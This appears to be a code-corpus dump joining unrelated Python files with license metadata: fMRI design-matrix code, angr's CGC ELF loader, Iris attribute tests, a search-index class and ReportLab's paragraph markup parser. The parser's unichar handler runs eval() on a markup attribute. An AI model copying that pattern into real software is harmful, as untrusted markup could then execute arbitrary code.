If None, while add_regs was provided, these will be termed
'reg_%i', i = 0..n_add_reg - 1
min_onset : float, optional
Minimal onset relative to frame_times[0] (in seconds)
events that start before frame_times[0] + min_onset are not considered.
oversampling: int, optional,
Oversampling factor used in temporal convolutions.
Returns
-------
design_matrix : DataFrame instance,
holding the computed design matrix, the index being the frames_times
and each column a regressor.
"""
# check arguments
# check that additional regressor specification is correct
n_add_regs = 0
if add_regs is not None:
if add_regs.shape[0] == np.size(add_regs):
add_regs = np.reshape(add_regs, (np.size(add_regs), 1))
n_add_regs = add_regs.shape[1]
assert add_regs.shape[0] == np.size(frame_times), ValueError(
'Incorrect specification of additional regressors: '
'length of regressors provided: %d, number of '
'time-frames: %d' % (add_regs.shape[0], np.size(frame_times)))
# check that additional regressor names are well specified
if add_reg_names is None:
add_reg_names = ['reg%d' % k for k in range(n_add_regs)]
elif len(add_reg_names) != n_add_regs:
raise ValueError(
'Incorrect number of additional regressor names was provided'
'(%d provided, %d expected' % (len(add_reg_names),
n_add_regs))
# computation of the matrix
names = []
matrix = None
# step 1: events-related regressors
if events is not None:
# create the condition-related regressors
if isinstance(hrf_model, _basestring):
hrf_model = hrf_model.lower()
matrix, names = _convolve_regressors(
events, hrf_model, frame_times, fir_delays, min_onset,
oversampling)
# step 2: additional regressors
if add_regs is not None:
# add user-supplied regressors and corresponding names
if matrix is not None:
matrix = np.hstack((matrix, add_regs))
else:
matrix = add_regs
names += add_reg_names
# step 3: drifts
drift, dnames = _make_drift(drift_model, frame_times, drift_order,
high_pass)
if matrix is not None:
matrix = np.hstack((matrix, drift))
else:
matrix = drift
names += dnames
# check column names are all unique
if len(np.unique(names)) != len(names):
raise ValueError('Design matrix columns do not have unique names')
# step 4: Force the design matrix to be full rank at working precision
matrix, _ = full_rank(matrix)
design_matrix = pd.DataFrame(
matrix, columns=names, index=frame_times)
return design_matrix
def check_design_matrix(design_matrix):
""" Check that the provided DataFrame is indeed a valid design matrix
descriptor, and returns a triplet of fields
Parameters
----------
design matrix : pandas DataFrame,
Describes a design matrix.
Returns
-------
frame_times : array of shape (n_frames,),
Sampling times of the design matrix in seconds.
matrix : array of shape (n_frames, n_regressors), dtype='f'
Numerical values for the design matrix.
names : array of shape (n_events,), dtype='f'
Per-event onset time (in seconds)
"""
names = [name for name in design_matrix.keys()]
frame_times = design_matrix.index
matrix = design_matrix.values
return frame_times, matrix, names
def make_second_level_design_matrix(subjects_label, confounds=None):
"""Sets up a second level design.
Construct a design matrix with an intercept and subject specific confounds.
Parameters
----------
subjects_label: list of str
Contain subject labels to extract confounders in the right order,
corresponding with the images, to create the design matrix.
confounds: pandas DataFrame, optional
If given, contains at least two columns, 'subject_label' and one
confound. The subjects list determines the rows to extract from
confounds thanks to its 'subject_label' column. All subjects must
have confounds specified. There should be only one row per subject.
Returns
-------
design_matrix: pandas DataFrame
The second level design matrix
"""
confounds_name = []
if confounds is not None:
confounds_name = confounds.columns.tolist()
confounds_name.remove('subject_label')
design_columns = (confounds_name + ['intercept'])
# check column names are unique
if len(np.unique(design_columns)) != len(design_columns):
raise ValueError('Design matrix columns do not have unique names')
# float dtype necessary for linalg
design_matrix = pd.DataFrame(columns=design_columns, dtype=float)
for ridx, subject_label in enumerate(subjects_label):
design_matrix.loc[ridx] = [0] * len(design_columns)
design_matrix.loc[ridx, 'intercept'] = 1
if confounds is not None:
conrow = confounds['subject_label'] == subject_label
if np.sum(conrow) > 1:
raise ValueError('confounds contain more than one row for '
'subject %s' % subject_label)
elif np.sum(conrow) == 0:
raise ValueError('confounds not specified for subject %s' %
subject_label)
for conf_name in confounds_name:
confounds_value = confounds[conrow][conf_name].values[0]
design_matrix.loc[ridx, conf_name] = confounds_value
# check design matrix is not singular
sys.float_info.epsilon
if np.linalg.cond(design_matrix.values) > design_matrix.size:
warn('Attention: Design matrix is singular. Aberrant estimates '
'are expected.')
return design_matrix
| bsd-3-clause | -7,965,344,307,184,148,000 | 35.963203 | 79 | 0.624758 | false |
angr/cle | cle/backends/cgc/cgc.py | 1 | 1352 | from ...address_translator import AT
from .. import register_backend
from ..elf import ELF
from ...patched_stream import PatchedStream
ELF_HEADER = bytes.fromhex("7f454c46010101000000000000000000")
CGC_HEADER = bytes.fromhex("7f43474301010143014d6572696e6f00")
class CGC(ELF):
"""
Backend to support the CGC elf format used by the Cyber Grand Challenge competition.
See : https://github.com/CyberGrandChallenge/libcgcef/blob/master/cgc_executable_format.md
"""
is_default = True # Tell CLE to automatically consider using the CGC backend
def __init__(self, binary, binary_stream, *args, **kwargs):
binary_stream = PatchedStream(binary_stream, [(0, ELF_HEADER)])
super().__init__(binary, binary_stream, *args, **kwargs)
self.memory.store(AT.from_raw(0, self).to_rva(), CGC_HEADER) # repair the CGC header
self.os = 'cgc'
self.execstack = True # the stack is always executable in CGC
@staticmethod
def is_compatible(stream):
stream.seek(0)
identstring = stream.read(4)
stream.seek(0)
if identstring.startswith(b'\x7fCGC'):
return True
return False
def _load_segment(self, seg):
if seg.header.p_memsz > 0:
super()._load_segment(seg)
supported_filetypes = ['cgc']
register_backend('cgc', CGC)
| bsd-2-clause | -3,029,612,784,850,716,000 | 32.8 | 94 | 0.664201 | false |
bjlittle/iris | lib/iris/tests/unit/util/test_equalise_attributes.py | 1 | 4697 | # Copyright Iris contributors
#
# This file is part of Iris and is released under the LGPL license.
# See COPYING and COPYING.LESSER in the root of the repository for full
# licensing details.
"""
Unit tests for the :func:`iris.util.equalise_attributes` function.
"""
# import iris tests first so that some things can be initialised
# before importing anything else.
import iris.tests as tests # isort:skip
import numpy as np
from iris.cube import Cube
import iris.tests.stock
from iris.util import equalise_attributes
class TestEqualiseAttributes(tests.IrisTest):
def setUp(self):
empty = Cube([])
self.cube_no_attrs = empty.copy()
self.cube_a1 = empty.copy()
self.cube_a1.attributes.update({"a": 1})
self.cube_a2 = empty.copy()
self.cube_a2.attributes.update({"a": 2})
self.cube_a1b5 = empty.copy()
self.cube_a1b5.attributes.update({"a": 1, "b": 5})
self.cube_a1b6 = empty.copy()
self.cube_a1b6.attributes.update({"a": 1, "b": 6})
self.cube_a2b6 = empty.copy()
self.cube_a2b6.attributes.update({"a": 2, "b": 6})
self.cube_b5 = empty.copy()
self.cube_b5.attributes.update({"b": 5})
# Array attribute values
v1 = np.array([11, 12, 13])
v2 = np.array([11, 9999, 13])
self.v1 = v1
self.cube_a1b5v1 = empty.copy()
self.cube_a1b5v1.attributes.update({"a": 1, "b": 5, "v": v1})
self.cube_a1b6v1 = empty.copy()
self.cube_a1b6v1.attributes.update({"a": 1, "b": 6, "v": v1})
self.cube_a1b6v2 = empty.copy()
self.cube_a1b6v2.attributes.update({"a": 1, "b": 6, "v": v2})
def _test(self, cubes, expect_attributes):
"""Test."""
working_cubes = [cube.copy() for cube in cubes]
original_working_list = [cube for cube in working_cubes]
# Exercise basic operation
equalise_attributes(working_cubes)
# Check they are the same cubes
self.assertEqual(working_cubes, original_working_list)
# Check resulting attributes all match the expected set
for cube in working_cubes:
self.assertEqual(cube.attributes, expect_attributes)
# Check everything else remains the same
for new_cube, old_cube in zip(working_cubes, cubes):
cube_before_noatts = old_cube.copy()
cube_before_noatts.attributes.clear()
cube_after_noatts = new_cube.copy()
cube_after_noatts.attributes.clear()
self.assertEqual(cube_after_noatts, cube_before_noatts)
def test_no_attrs(self):
cubes = [self.cube_no_attrs]
self._test(cubes, {})
def test_single(self):
cubes = [self.cube_a1]
self._test(cubes, {"a": 1})
def test_identical(self):
cubes = [self.cube_a1, self.cube_a1.copy()]
self._test(cubes, {"a": 1})
def test_one_extra(self):
cubes = [self.cube_a1, self.cube_a1b5.copy()]
self._test(cubes, {"a": 1})
def test_one_different(self):
cubes = [self.cube_a1b5, self.cube_a1b6]
self._test(cubes, {"a": 1})
def test_common_no_diffs(self):
cubes = [self.cube_a1b5, self.cube_a1b5.copy()]
self._test(cubes, {"a": 1, "b": 5})
def test_common_all_diffs(self):
cubes = [self.cube_a1b5, self.cube_a2b6]
self._test(cubes, {})
def test_none_common(self):
cubes = [self.cube_a1, self.cube_b5]
self._test(cubes, {})
def test_array_extra(self):
cubes = [self.cube_a1b6, self.cube_a1b6v1]
self._test(cubes, {"a": 1, "b": 6})
def test_array_different(self):
cubes = [self.cube_a1b5v1, self.cube_a1b6v2]
self._test(cubes, {"a": 1})
def test_array_same(self):
cubes = [self.cube_a1b5v1, self.cube_a1b6v1]
self._test(cubes, {"a": 1, "v": self.v1})
@tests.skip_data
def test_complex_nonecommon(self):
# Example with cell methods and factories, but no common attributes.
cubes = [
iris.tests.stock.global_pp(),
iris.tests.stock.hybrid_height(),
]
self._test(cubes, {})
@tests.skip_data
def test_complex_somecommon(self):
# Example with cell methods and factories, plus some common attributes.
cubes = [iris.tests.stock.global_pp(), iris.tests.stock.simple_pp()]
self._test(
cubes,
{
"STASH": iris.fileformats.pp.STASH(
model=1, section=16, item=203
),
"source": "Data from Met Office Unified Model",
},
)
if __name__ == "__main__":
tests.main()
| lgpl-3.0 | -7,437,314,332,573,180,000 | 30.736486 | 79 | 0.585054 | false |
crateio/crate.web | crate/web/search/indexes.py | 1 | 2307 | from django.db.models import signals
from celery_haystack.indexes import CelerySearchIndex as BaseCelerySearchIndex
from crate.web.packages.models import Package, Release, ReleaseFile
class PackageCelerySearchIndex(BaseCelerySearchIndex):
# We override the built-in _setup_* methods to connect the enqueuing
# operation.
def _setup_save(self, model=None):
model = self.handle_model(model)
signals.post_save.connect(self.enqueue_save, sender=model)
signals.post_save.connect(self.enqueue_save_from_release, sender=Release)
signals.post_save.connect(self.enqueue_save_from_releasefile, sender=ReleaseFile)
def _setup_delete(self, model=None):
model = self.handle_model(model)
signals.post_delete.connect(self.enqueue_delete, sender=model)
signals.post_delete.connect(self.enqueue_delete_from_release, sender=Release)
signals.post_delete.connect(self.enqueue_delete_from_releasefile, sender=ReleaseFile)
def _teardown_save(self, model=None):
model = self.handle_model(model)
signals.post_save.disconnect(self.enqueue_save, sender=model)
signals.post_save.disconnect(self.enqueue_save_from_release, sender=Release)
signals.post_save.disconnect(self.enqueue_save_from_releasefile, sender=ReleaseFile)
def _teardown_delete(self, model=None):
model = self.handle_model(model)
signals.post_delete.disconnect(self.enqueue_delete, sender=model)
signals.post_delete.disconnect(self.enqueue_delete_from_release, sender=Release)
signals.post_delete.disconnect(self.enqueue_delete_from_releasefile, sender=ReleaseFile)
def enqueue_save_from_release(self, instance, **kwargs):
return self.enqueue('update', instance.package)
def enqueue_delete_from_release(self, instance, **kwargs):
try:
return self.enqueue('update', instance.package)
except Package.DoesNotExist:
pass
def enqueue_save_from_releasefile(self, instance, **kwargs):
return self.enqueue('update', instance.release.package)
def enqueue_delete_from_releasefile(self, instance, **kwargs):
try:
return self.enqueue('update', instance.release.package)
except Release.DoesNotExist:
pass
| bsd-2-clause | 6,856,013,931,906,348,000 | 43.365385 | 96 | 0.714781 | false |
makinacorpus/reportlab-ecomobile | src/reportlab/platypus/paraparser.py | 1 | 37402 | #Copyright ReportLab Europe Ltd. 2000-2004
#see license.txt for license details
#history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/platypus/paraparser.py
__version__=''' $Id$ '''
__doc__='''The parser used to process markup within paragraphs'''
import string
import re
from types import TupleType, UnicodeType, StringType
import sys
import os
import copy
import unicodedata
import reportlab.lib.sequencer
from reportlab.lib.abag import ABag
from reportlab.lib.utils import ImageReader
from reportlab.lib import xmllib
from reportlab.lib.colors import toColor, white, black, red, Color
from reportlab.lib.fonts import tt2ps, ps2tt
from reportlab.lib.enums import TA_LEFT, TA_RIGHT, TA_CENTER, TA_JUSTIFY
from reportlab.lib.units import inch,mm,cm,pica
_re_para = re.compile(r'^\s*<\s*para(?:\s+|>|/>)')
sizeDelta = 2 # amount to reduce font size by for super and sub script
subFraction = 0.5 # fraction of font size that a sub script should be lowered
superFraction = 0.5 # fraction of font size that a super script should be raised
def _convnum(s, unit=1):
if s[0] in ['+','-']:
try:
return ('relative',int(s)*unit)
except ValueError:
return ('relative',float(s)*unit)
else:
try:
return int(s)*unit
except ValueError:
return float(s)*unit
def _num(s, unit=1):
"""Convert a string like '10cm' to an int or float (in points).
The default unit is point, but optionally you can use other
default units like mm.
"""
if s[-2:]=='cm':
unit=cm
s = s[:-2]
if s[-2:]=='in':
unit=inch
s = s[:-2]
if s[-2:]=='pt':
unit=1
s = s[:-2]
if s[-1:]=='i':
unit=inch
s = s[:-1]
if s[-2:]=='mm':
unit=mm
s = s[:-2]
if s[-4:]=='pica':
unit=pica
s = s[:-4]
return _convnum(s,unit)
class _PCT:
def __init__(self,v):
self._value = v*0.01
def normalizedValue(self,normalizer):
return normalizer*self._value
def _valignpc(s):
s = s.lower()
if s in ('baseline','sub','super','top','text-top','middle','bottom','text-bottom'):
return s
if s.endswith('%'):
n = _convnum(s[:-1])
if isinstance(n,tuple):
n = n[1]
return _PCT(n)
n = _num(s)
if isinstance(n,tuple):
n = n[1]
return n
def _autoLeading(x):
x = x.lower()
if x in ('','min','max','off'):
return x
raise ValueError('Invalid autoLeading=%r' % x )
def _align(s):
s = string.lower(s)
if s=='left': return TA_LEFT
elif s=='right': return TA_RIGHT
elif s=='justify': return TA_JUSTIFY
elif s in ('centre','center'): return TA_CENTER
else: raise ValueError
_paraAttrMap = {'font': ('fontName', None),
'face': ('fontName', None),
'fontsize': ('fontSize', _num),
'size': ('fontSize', _num),
'leading': ('leading', _num),
'autoleading': ('autoLeading', _autoLeading),
'lindent': ('leftIndent', _num),
'rindent': ('rightIndent', _num),
'findent': ('firstLineIndent', _num),
'align': ('alignment', _align),
'spaceb': ('spaceBefore', _num),
'spacea': ('spaceAfter', _num),
'bfont': ('bulletFontName', None),
'bfontsize': ('bulletFontSize',_num),
'boffsety': ('bulletOffsetY',_num),
'bindent': ('bulletIndent',_num),
'bcolor': ('bulletColor',toColor),
'color':('textColor',toColor),
'backcolor':('backColor',toColor),
'bgcolor':('backColor',toColor),
'bg':('backColor',toColor),
'fg': ('textColor',toColor),
}
_bulletAttrMap = {
'font': ('bulletFontName', None),
'face': ('bulletFontName', None),
'size': ('bulletFontSize',_num),
'fontsize': ('bulletFontSize',_num),
'offsety': ('bulletOffsetY',_num),
'indent': ('bulletIndent',_num),
'color': ('bulletColor',toColor),
'fg': ('bulletColor',toColor),
}
#things which are valid font attributes
_fontAttrMap = {'size': ('fontSize', _num),
'face': ('fontName', None),
'name': ('fontName', None),
'fg': ('textColor', toColor),
'color':('textColor', toColor),
'backcolor':('backColor',toColor),
'bgcolor':('backColor',toColor),
}
#things which are valid font attributes
_linkAttrMap = {'size': ('fontSize', _num),
'face': ('fontName', None),
'name': ('fontName', None),
'fg': ('textColor', toColor),
'color':('textColor', toColor),
'backcolor':('backColor',toColor),
'bgcolor':('backColor',toColor),
'dest': ('link', None),
'destination': ('link', None),
'target': ('link', None),
'href': ('link', None),
}
_anchorAttrMap = {'fontSize': ('fontSize', _num),
'fontName': ('fontName', None),
'name': ('name', None),
'fg': ('textColor', toColor),
'color':('textColor', toColor),
'backcolor':('backColor',toColor),
'bgcolor':('backColor',toColor),
'href': ('href', None),
}
_imgAttrMap = {
'src': ('src', None),
'width': ('width',_num),
'height':('height',_num),
'valign':('valign',_valignpc),
}
def _addAttributeNames(m):
K = m.keys()
for k in K:
n = m[k][0]
if not m.has_key(n): m[n] = m[k]
n = string.lower(n)
if not m.has_key(n): m[n] = m[k]
_addAttributeNames(_paraAttrMap)
_addAttributeNames(_fontAttrMap)
_addAttributeNames(_bulletAttrMap)
_addAttributeNames(_anchorAttrMap)
_addAttributeNames(_linkAttrMap)
def _applyAttributes(obj, attr):
for k, v in attr.items():
if type(v) is TupleType and v[0]=='relative':
#AR 20/5/2000 - remove 1.5.2-ism
#v = v[1]+getattr(obj,k,0)
if hasattr(obj, k):
v = v[1]+getattr(obj,k)
else:
v = v[1]
setattr(obj,k,v)
#Named character entities intended to be supported from the special font
#with additions suggested by Christoph Zwerschke who also suggested the
#numeric entity names that follow.
greeks = {
'pound': '\xc2\xa3',
'nbsp': '\xc2\xa0',
'alefsym': '\xe2\x84\xb5',
'Alpha': '\xce\x91',
'alpha': '\xce\xb1',
'and': '\xe2\x88\xa7',
'ang': '\xe2\x88\xa0',
'asymp': '\xe2\x89\x88',
'Beta': '\xce\x92',
'beta': '\xce\xb2',
'bull': '\xe2\x80\xa2',
'cap': '\xe2\x88\xa9',
'Chi': '\xce\xa7',
'chi': '\xcf\x87',
'clubs': '\xe2\x99\xa3',
'cong': '\xe2\x89\x85',
'cup': '\xe2\x88\xaa',
'darr': '\xe2\x86\x93',
'dArr': '\xe2\x87\x93',
'delta': '\xce\xb4',
'Delta': '\xe2\x88\x86',
'diams': '\xe2\x99\xa6',
'empty': '\xe2\x88\x85',
'Epsilon': '\xce\x95',
'epsilon': '\xce\xb5',
'epsiv': '\xce\xb5',
'equiv': '\xe2\x89\xa1',
'Eta': '\xce\x97',
'eta': '\xce\xb7',
'euro': '\xe2\x82\xac',
'exist': '\xe2\x88\x83',
'forall': '\xe2\x88\x80',
'frasl': '\xe2\x81\x84',
'Gamma': '\xce\x93',
'gamma': '\xce\xb3',
'ge': '\xe2\x89\xa5',
'harr': '\xe2\x86\x94',
'hArr': '\xe2\x87\x94',
'hearts': '\xe2\x99\xa5',
'hellip': '\xe2\x80\xa6',
'image': '\xe2\x84\x91',
'infin': '\xe2\x88\x9e',
'int': '\xe2\x88\xab',
'Iota': '\xce\x99',
'iota': '\xce\xb9',
'isin': '\xe2\x88\x88',
'Kappa': '\xce\x9a',
'kappa': '\xce\xba',
'Lambda': '\xce\x9b',
'lambda': '\xce\xbb',
'lang': '\xe2\x8c\xa9',
'larr': '\xe2\x86\x90',
'lArr': '\xe2\x87\x90',
'lceil': '\xef\xa3\xae',
'le': '\xe2\x89\xa4',
'lfloor': '\xef\xa3\xb0',
'lowast': '\xe2\x88\x97',
'loz': '\xe2\x97\x8a',
'minus': '\xe2\x88\x92',
'mu': '\xc2\xb5',
'Mu': '\xce\x9c',
'nabla': '\xe2\x88\x87',
'ne': '\xe2\x89\xa0',
'ni': '\xe2\x88\x8b',
'notin': '\xe2\x88\x89',
'nsub': '\xe2\x8a\x84',
'Nu': '\xce\x9d',
'nu': '\xce\xbd',
'oline': '\xef\xa3\xa5',
'omega': '\xcf\x89',
'Omega': '\xe2\x84\xa6',
'Omicron': '\xce\x9f',
'omicron': '\xce\xbf',
'oplus': '\xe2\x8a\x95',
'or': '\xe2\x88\xa8',
'otimes': '\xe2\x8a\x97',
'part': '\xe2\x88\x82',
'perp': '\xe2\x8a\xa5',
'Phi': '\xce\xa6',
'phi': '\xcf\x95',
'phis': '\xcf\x86',
'Pi': '\xce\xa0',
'pi': '\xcf\x80',
'piv': '\xcf\x96',
'prime': '\xe2\x80\xb2',
'prod': '\xe2\x88\x8f',
'prop': '\xe2\x88\x9d',
'Psi': '\xce\xa8',
'psi': '\xcf\x88',
'radic': '\xe2\x88\x9a',
'rang': '\xe2\x8c\xaa',
'rarr': '\xe2\x86\x92',
'rArr': '\xe2\x87\x92',
'rceil': '\xef\xa3\xb9',
'real': '\xe2\x84\x9c',
'rfloor': '\xef\xa3\xbb',
'Rho': '\xce\xa1',
'rho': '\xcf\x81',
'sdot': '\xe2\x8b\x85',
'Sigma': '\xce\xa3',
'sigma': '\xcf\x83',
'sigmaf': '\xcf\x82',
'sigmav': '\xcf\x82',
'sim': '\xe2\x88\xbc',
'spades': '\xe2\x99\xa0',
'sub': '\xe2\x8a\x82',
'sube': '\xe2\x8a\x86',
'sum': '\xe2\x88\x91',
'sup': '\xe2\x8a\x83',
'supe': '\xe2\x8a\x87',
'Tau': '\xce\xa4',
'tau': '\xcf\x84',
'there4': '\xe2\x88\xb4',
'Theta': '\xce\x98',
'theta': '\xce\xb8',
'thetasym': '\xcf\x91',
'thetav': '\xcf\x91',
'trade': '\xef\xa3\xaa',
'uarr': '\xe2\x86\x91',
'uArr': '\xe2\x87\x91',
'upsih': '\xcf\x92',
'Upsilon': '\xce\xa5',
'upsilon': '\xcf\x85',
'weierp': '\xe2\x84\x98',
'Xi': '\xce\x9e',
'xi': '\xce\xbe',
'Zeta': '\xce\x96',
'zeta': '\xce\xb6',
}
#------------------------------------------------------------------------
class ParaFrag(ABag):
"""class ParaFrag contains the intermediate representation of string
segments as they are being parsed by the XMLParser.
fontname, fontSize, rise, textColor, cbDefn
"""
_greek2Utf8=None
def _greekConvert(data):
global _greek2Utf8
if not _greek2Utf8:
from reportlab.pdfbase.rl_codecs import RL_Codecs
import codecs
dm = decoding_map = codecs.make_identity_dict(xrange(32,256))
for k in xrange(0,32):
dm[k] = None
dm.update(RL_Codecs._RL_Codecs__rl_codecs_data['symbol'][0])
_greek2Utf8 = {}
for k,v in dm.iteritems():
if not v:
u = '\0'
else:
u = unichr(v).encode('utf8')
_greek2Utf8[chr(k)] = u
return ''.join(map(_greek2Utf8.__getitem__,data))
#------------------------------------------------------------------
# !!! NOTE !!! THIS TEXT IS NOW REPLICATED IN PARAGRAPH.PY !!!
# The ParaFormatter will be able to format the following
# tags:
# < /b > - bold
# < /i > - italics
# < u > < /u > - underline
# < strike > < /strike > - strike through
# < super > < /super > - superscript
# < sup > < /sup > - superscript
# < sub > < /sub > - subscript
# <font name=fontfamily/fontname color=colorname size=float>
# < bullet > </bullet> - bullet text (at head of para only)
# <onDraw name=callable label="a label">
# <link>link text</link>
# attributes of links
# size/fontSize=num
# name/face/fontName=name
# fg/textColor/color=color
# backcolor/backColor/bgcolor=color
# dest/destination/target/href/link=target
# <a>anchor text</a>
# attributes of anchors
# fontSize=num
# fontName=name
# fg/textColor/color=color
# backcolor/backColor/bgcolor=color
# href=href
# <a name="anchorpoint"/>
# <unichar name="unicode character name"/>
# <unichar value="unicode code point"/>
# <img src="path" width="1in" height="1in" valign="bottom"/>
# <greek> - </greek>
#
# The whole may be surrounded by <para> </para> tags
#
# It will also be able to handle any MathML specified Greek characters.
#------------------------------------------------------------------
class ParaParser(xmllib.XMLParser):
#----------------------------------------------------------
# First we will define all of the xml tag handler functions.
#
# start_<tag>(attributes)
# end_<tag>()
#
# While parsing the xml ParaFormatter will call these
# functions to handle the string formatting tags.
# At the start of each tag the corresponding field will
# be set to 1 and at the end tag the corresponding field will
# be set to 0. Then when handle_data is called the options
# for that data will be aparent by the current settings.
#----------------------------------------------------------
def __getattr__( self, attrName ):
"""This way we can handle <TAG> the same way as <tag> (ignoring case)."""
if attrName!=attrName.lower() and attrName!="caseSensitive" and not self.caseSensitive and \
(attrName.startswith("start_") or attrName.startswith("end_")):
return getattr(self,attrName.lower())
raise AttributeError, attrName
#### bold
def start_b( self, attributes ):
self._push(bold=1)
def end_b( self ):
self._pop(bold=1)
def start_strong( self, attributes ):
self._push(bold=1)
def end_strong( self ):
self._pop(bold=1)
#### italics
def start_i( self, attributes ):
self._push(italic=1)
def end_i( self ):
self._pop(italic=1)
def start_em( self, attributes ):
self._push(italic=1)
def end_em( self ):
self._pop(italic=1)
#### underline
def start_u( self, attributes ):
self._push(underline=1)
def end_u( self ):
self._pop(underline=1)
#### strike
def start_strike( self, attributes ):
self._push(strike=1)
def end_strike( self ):
self._pop(strike=1)
#### link
def start_link(self, attributes):
self._push(**self.getAttributes(attributes,_linkAttrMap))
def end_link(self):
frag = self._stack[-1]
del self._stack[-1]
assert frag.link!=None
#### anchor
def start_a(self, attributes):
A = self.getAttributes(attributes,_anchorAttrMap)
name = A.get('name',None)
if name is not None:
name = name.strip()
if not name:
self._syntax_error('<a name="..."/> anchor variant requires non-blank name')
if len(A)>1:
self._syntax_error('<a name="..."/> anchor variant only allows name attribute')
A = dict(name=A['name'])
A['_selfClosingTag'] = 'anchor'
else:
href = A.get('href','').strip()
if not href:
self._syntax_error('<a> tag must have non-blank name or href attribute')
A['link'] = href #convert to our link form
A.pop('href')
self._push(**A)
def end_a(self):
frag = self._stack[-1]
sct = getattr(frag,'_selfClosingTag','')
if sct:
assert sct=='anchor' and frag.name,'Parser failure in <a/>'
defn = frag.cbDefn = ABag()
defn.label = defn.kind = 'anchor'
defn.name = frag.name
del frag.name, frag._selfClosingTag
self.handle_data('')
self._pop()
else:
del self._stack[-1]
assert frag.link!=None
def start_img(self,attributes):
A = self.getAttributes(attributes,_imgAttrMap)
if not A.get('src'):
self._syntax_error('<img> needs src attribute')
A['_selfClosingTag'] = 'img'
self._push(**A)
def end_img(self):
frag = self._stack[-1]
assert getattr(frag,'_selfClosingTag',''),'Parser failure in <img/>'
defn = frag.cbDefn = ABag()
defn.kind = 'img'
defn.src = getattr(frag,'src',None)
defn.image = ImageReader(defn.src)
size = defn.image.getSize()
defn.width = getattr(frag,'width',size[0])
defn.height = getattr(frag,'height',size[1])
defn.valign = getattr(frag,'valign','bottom')
del frag._selfClosingTag
self.handle_data('')
self._pop()
#### super script
def start_super( self, attributes ):
self._push(super=1)
def end_super( self ):
self._pop(super=1)
start_sup = start_super
end_sup = end_super
#### sub script
def start_sub( self, attributes ):
self._push(sub=1)
def end_sub( self ):
self._pop(sub=1)
#### greek script
#### add symbol encoding
def handle_charref(self, name):
try:
if name[0]=='x':
n = int(name[1:],16)
else:
n = int(name)
except ValueError:
self.unknown_charref(name)
return
self.handle_data(unichr(n).encode('utf8'))
def handle_entityref(self,name):
if greeks.has_key(name):
self.handle_data(greeks[name])
else:
xmllib.XMLParser.handle_entityref(self,name)
def syntax_error(self,lineno,message):
self._syntax_error(message)
def _syntax_error(self,message):
if message[:10]=="attribute " and message[-17:]==" value not quoted": return
self.errors.append(message)
def start_greek(self, attr):
self._push(greek=1)
def end_greek(self):
self._pop(greek=1)
def start_unichar(self, attr):
if attr.has_key('name'):
if attr.has_key('code'):
self._syntax_error('<unichar/> invalid with both name and code attributes')
try:
v = unicodedata.lookup(attr['name']).encode('utf8')
except KeyError:
self._syntax_error('<unichar/> invalid name attribute\n"%s"' % name)
v = '\0'
elif attr.has_key('code'):
try:
v = unichr(int(eval(attr['code']))).encode('utf8')
except:
self._syntax_error('<unichar/> invalid code attribute %s' % attr['code'])
v = '\0'
else:
v = None
if attr:
self._syntax_error('<unichar/> invalid attribute %s' % attr.keys()[0])
if v is not None:
self.handle_data(v)
self._push(_selfClosingTag='unichar')
def end_unichar(self):
self._pop()
def start_font(self,attr):
self._push(**self.getAttributes(attr,_fontAttrMap))
def end_font(self):
self._pop()
def start_br(self, attr):
#just do the trick to make sure there is no content
self._push(_selfClosingTag='br',lineBreak=True,text='')
def end_br(self):
frag = self._stack[-1]
assert frag._selfClosingTag=='br' and frag.lineBreak,'Parser failure in <br/>'
del frag._selfClosingTag
self.handle_data('')
self._pop()
def _initial_frag(self,attr,attrMap,bullet=0):
style = self._style
if attr!={}:
style = copy.deepcopy(style)
_applyAttributes(style,self.getAttributes(attr,attrMap))
self._style = style
# initialize semantic values
frag = ParaFrag()
frag.sub = 0
frag.super = 0
frag.rise = 0
frag.underline = 0
frag.strike = 0
frag.greek = 0
frag.link = None
if bullet:
frag.fontName, frag.bold, frag.italic = ps2tt(style.bulletFontName)
frag.fontSize = style.bulletFontSize
frag.textColor = hasattr(style,'bulletColor') and style.bulletColor or style.textColor
else:
frag.fontName, frag.bold, frag.italic = ps2tt(style.fontName)
frag.fontSize = style.fontSize
frag.textColor = style.textColor
return frag
def start_para(self,attr):
self._stack = [self._initial_frag(attr,_paraAttrMap)]
def end_para(self):
self._pop()
def start_bullet(self,attr):
if hasattr(self,'bFragList'):
self._syntax_error('only one <bullet> tag allowed')
self.bFragList = []
frag = self._initial_frag(attr,_bulletAttrMap,1)
frag.isBullet = 1
self._stack.append(frag)
def end_bullet(self):
self._pop()
#---------------------------------------------------------------
def start_seqdefault(self, attr):
try:
default = attr['id']
except KeyError:
default = None
self._seq.setDefaultCounter(default)
def end_seqdefault(self):
pass
def start_seqreset(self, attr):
try:
id = attr['id']
except KeyError:
id = None
try:
base = int(attr['base'])
except:
base=0
self._seq.reset(id, base)
def end_seqreset(self):
pass
def start_seqchain(self, attr):
try:
order = attr['order']
except KeyError:
order = ''
order = order.split()
seq = self._seq
for p,c in zip(order[:-1],order[1:]):
seq.chain(p, c)
end_seqchain = end_seqreset
def start_seqformat(self, attr):
try:
id = attr['id']
except KeyError:
id = None
try:
value = attr['value']
except KeyError:
value = '1'
self._seq.setFormat(id,value)
end_seqformat = end_seqreset
# AR hacking in aliases to allow the proper casing for RML.
# the above ones should be deprecated over time. 2001-03-22
start_seqDefault = start_seqdefault
end_seqDefault = end_seqdefault
start_seqReset = start_seqreset
end_seqReset = end_seqreset
start_seqChain = start_seqchain
end_seqChain = end_seqchain
start_seqFormat = start_seqformat
end_seqFormat = end_seqformat
def start_seq(self, attr):
#if it has a template, use that; otherwise try for id;
#otherwise take default sequence
if attr.has_key('template'):
templ = attr['template']
self.handle_data(templ % self._seq)
return
elif attr.has_key('id'):
id = attr['id']
else:
id = None
increment = attr.get('inc', None)
if not increment:
output = self._seq.nextf(id)
else:
#accepts "no" for do not increment, or an integer.
#thus, 0 and 1 increment by the right amounts.
if increment.lower() == 'no':
output = self._seq.thisf(id)
else:
incr = int(increment)
output = self._seq.thisf(id)
self._seq.reset(id, self._seq._this() + incr)
self.handle_data(output)
def end_seq(self):
pass
def start_onDraw(self,attr):
defn = ABag()
if attr.has_key('name'): defn.name = attr['name']
else: self._syntax_error('<onDraw> needs at least a name attribute')
if attr.has_key('label'): defn.label = attr['label']
defn.kind='onDraw'
self._push(cbDefn=defn)
self.handle_data('')
self._pop()
#---------------------------------------------------------------
def _push(self,**attr):
frag = copy.copy(self._stack[-1])
_applyAttributes(frag,attr)
self._stack.append(frag)
def _pop(self,**kw):
frag = self._stack[-1]
del self._stack[-1]
